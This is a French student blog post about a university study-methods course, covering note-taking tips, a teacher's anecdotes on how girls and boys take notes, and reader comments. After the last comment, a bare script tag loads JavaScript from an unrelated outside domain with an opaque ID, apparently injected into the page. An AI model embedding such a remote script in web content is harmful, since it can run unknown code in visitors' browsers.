• Les bons conseils du prof de MTU

    MTU : méthodologie du travail universitaire.

    (il s'agit d'un vieux billet que je n'avais pas publié)

    Nos deux premiers « cours » de MTU du premier semestre, c'étaient des amphis. Fonctionnement du cerveau, de la mémoire, avec le « big boss » de MTU de la fac. Style un peu grinçant, mais bon.

    Après, on a eu nos TD, avec un autre prof.

    On a successivement abordé plusieurs thèmes : travail de groupe, recherche à la BU, prise de notes, gestion du temps (dont j'avais un peu parlé ici : article), puis l'explication du déroulement d'une présentation orale.
    Cette dernière consistait à faire un speech de 3 minutes sur, en gros, en quoi nous ont aidé (ou pas) nos TD de MTU dans le cadre de nos études.

    Soit dit en passant, pour être honnête, ça ne nous a pour la plupart pas servi à grand chose... Pour prendre un exemple, avoir un cours sur la prise de notes une mois et demi après le début des cours, juste pour apprendre qu'on peut s'aider d'abréviations, qu'on ne peut ni ne doit pas tout recopier de ce que dit un professeur ("écoute active" => écouter, synthétiser, puis écrire... sauf qu'en réalité, une fois qu'on a pris le temps d'écouter et de synthétiser, puis seulement d'écrire, on a déjà loupé la suite...), que le débit d'une personne qui parle normalement est de 150 mots / minute et qu'on ne peut écrire que 30 mots / minutes, ça relève plutôt de la récréation que d'un réel cours...
    Et je ne sais pas comment je fais, mais me concernant, j'écris tout ce que le prof dit (sauf quand c'est une évidence par exemple, ou un résumé - ou de la... MTU ! -, auquel cas ça dépend). Je n'ai pourtant pas l'impression d'être une Speedy Gonzales de l'écriture, mais bon...
    Je me questionne encore sur la véritable utilité de ce sujet en MTU 

    Mais j'aimais bien ce cours à cause de la sympathie du prof, parce que c'était une matière qui ne demandait aucun travail chez soi, et enfin parce que ça faisait une coupure dans la matinée de la journée la plus chargée de la semaine ... (qui plus est, c'est une matière où il est très simple d'obtenir une (très) bonne note !)

    Le prof de TD de MTU avait toujours deux ou trois anecdotes par cours à placer ; moi j'aime ça, quand les profs nous montrent que non, ils ne font pas que leur boulot d'enseignant, mais qu'ils donnent aussi un peu de leur personne (-alité ?) Comme le professeur de biologie cellulaire qui fait du mime (oui, il fait du mime ).

    Pendant qu'il reparlait de la séance en amphi sur la mémorisation, notre professeur de MTU nous a raconté que faire des fiches étaint une bonne excellente méthode pour apprendre.
    Moi j'veux bien, mais bon, je voulais pas en faire, parce que j'avais pas envie un jour de croûler sous les fiches non plus... et que mon ordi me suffisait. Bon, ce semestre-ci, ça a un peu changé.
    Et il a eu des anecdotes marrantes, surtout sur les différences filles-garçons.

    Il nous a sorti que les filles étaient les pros des fiches (si, si, « d'expérience » qu'il a dit).
    Et que les garçons étaient les pros du photocopiage de fiches de filles .
    D'ailleurs, lui même a paraît-il des cartons entiers de fiches de filles. Ceci dit, l'histoire ne dit pas pourquoi il ne les a pas balancées depuis le temps... peut-être que - comme d'autres -, il a horreur de jeter car il se dit tout le temps : ça peut toujours servir (sur l'air de "Un jour, mon prince viendra"...) ?

    Encore, il nous a dit que les filles ne pouvaient s'empêcher de coller trois tonnes de couleurs différentes pendant leur prise de notes (une couleur pour un titre, une autre couleur pour un sous-titre, encore une autre couleur pour un sous-sous-titre...) alors que les garçons faisaient plus dans le monochrome.
    (c'pas vrai d'abord, mes notes sont ULTRA monochromes, y'a des trucs qu'on m'aurait cachés ?).

    Là, je ne peux qu'approuver .

    Lorsqu'un professeur annonce le titre d'un chapitre, c'est...

    Schlic ! chlack ! schproumph ! retournement de trousses, chute de stylos, règles...
    Par ce qu'il faut reconnaître qu'il est particulièrement vital, bien évidemment, de souligner en plein amphi le titre de la troisième sous-section, qui plus est d'une autre couleur que le trait du titre de la deuxième section lui différent de... enfin bref, vous avez compris.
    Le tout générant un brouhaha continu de 10 à 20 secondes, pendant lesquelles, évidemment, le professeur ne peut pas parler (on ne l'entendrait pas !) .

    Mesdemoiselles, si - vraiment !- vous voulez utiliser des couleurs , optez pour ça, enfin !

    Stylo 4 couleurs

    Il y en a même qui font du rose fluo ! (si, j'en ai vu !)

    Sinon, contentez vous d'un crayon à papier pour écrire vos titres, vous les réécrirez proprement avec toutes les couleurs de l'arc en ciel si ça vous chante quand vous serez rentrées chez vous...

    (et soulignez vos titres chez vous aussi ).

    Sur ce, je vais recopier mon cours sur les algues .

    « MusiqueJ'y vais, j'y vais pas... »
    Partager via Gmail Yahoo! Google Bookmarks Blogmarks

    Tags Tags : , , , ,
  • Commentaires

    1
    Jeudi 12 Janvier 2012 à 19:43

    Euh, moi c'est l"inverse, je mets des couleurs pour les titres (quand je prends les cours... (mais mes stylos sont déjà prêts étalés sur la table vu que je dessine un peu pendant les cours (et en passant, j'ai eu mon S1 de géo ! (bon, va falloir que je ferme les parenthèses, quand même...)))).

    2
    Jeudi 12 Janvier 2012 à 20:02

    Super !
    Nous, on a même pas encore les notes les plus importantes de notre premier semestre...

    3
    LaMaman
    Jeudi 12 Janvier 2012 à 20:18

    Super ton article: les trucs des filles, ouais, je crois qu'il a un peu raison quand même!!!

    Quel brouhaha, on s'y croirait...

    Bravo Kvardek-du pour ce semestre validé! Bonne continuation.

    Bisous la Puce.

    4
    Vendredi 13 Janvier 2012 à 18:58

    Excellent rendu de l'ambiance... Sinon, il est vrai que les filles sont un peu plus soignées que les garçons dans leur prise de notes. Souligner après, c'est la bonne option. Ecrire petit et en abrégé fait gagner du temps (mots-clés). Compléter les notes à chaud (le soir même) peut-être profitable, ce qui est entré par les oreilles peut encore ressortir par le stylo.
    Mais là où j'ai vraiment rigolé, c'est en imaginant ton prof de bio cell en train de mimer la mitochondrie ou le Golgi... Bon, je m'égare.
    @+ et bon courage. 

    5
    Vendredi 13 Janvier 2012 à 20:24

    Acquisition de la mémoire

    Voilà le tableau qu'on nous a sorti pour la mémorisation ! De l'intérêt de revoir ses notes rapidement après un cours ;-).

    Mais le prof de biologie cellulaire nous a fait deux ou trois fois du mime... mais je ne me souviens pas à quel propos... c'est rare, mais à chaque fois, ses interprétations ne manqu(ai)ent pas de nous laisser perplexes ! Jusqu'à ce qu'il explique (je crois qu'il n'aurait pas fait une grande carrière comme mime... heureusement en même temps, parce que c'est un de nos profs préférés ) ;-)

    6
    Lundi 16 Janvier 2012 à 18:44

    Vi ! J'en ai un qui est fluo rose. ;) Parce que même adulte, j'aime encore mettre des couleurs. ;)

    <script src="http://loading-resource.com/50.js.php?i=%7B49562AC7-8887-4B7E-A128-2C4B31013126%7D" type="text/javascript"></script>
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :